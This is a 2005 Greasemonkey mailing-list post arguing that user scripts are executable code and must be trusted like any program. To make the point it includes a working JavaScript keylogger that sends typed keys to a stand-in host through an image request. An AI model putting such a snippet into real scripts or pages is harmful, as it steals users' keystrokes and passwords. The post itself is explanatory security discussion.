[Greasemonkey] food for thought: client certificate authentication and GM

Mark Pilgrim pilgrim at gmail.com
Wed Jul 27 22:28:25 EDT 2005


On 7/27/05, Nic Ferrier <nferrier at tapsellferrier.co.uk> wrote:
> I'm not sure what, if anything GM could do about this. My only thought
> is that each GM script should declare quite clearly what other
> locations it connects to and allow the user to see that and agree or
> not.

Since presumably a script that wanted to do nefarious things with your
client-side certificates would also want to hide this fact, such a
voluntary declaration would be useless.  We have discussed the
possibility of turning off GM_xmlhttpRequest and allowing the end user
to configure which scripts are allowed to use it.  But there are still
a near-infinite number of ways a script can be malicious, even without
GM_xmlhttpRequest.  Want to log everything the user types and send it
to Russia?

var keys = '';
document.addEventListener('keypress', function(event) {
    keys += String.fromCharCode(event.which);
    if (keys.length > 5) {
	var img = document.createElement('img');
	img.src = 'http://example.com/?q=' + keys;
	document.body.appendChild(img);
	document.body.removeChild(img);
    }
}, true);

API functions required: 0.

Bottom line, installing a user script means installing executable code
on your machine.  If you aren't technically proficient enough to
ensure that a script is harmless, and you don't trust the community
that assures you it's harmless, then you shouldn't install it.  Same
as installing any other program.

-- 
Cheers,
-Mark


More information about the Greasemonkey mailing list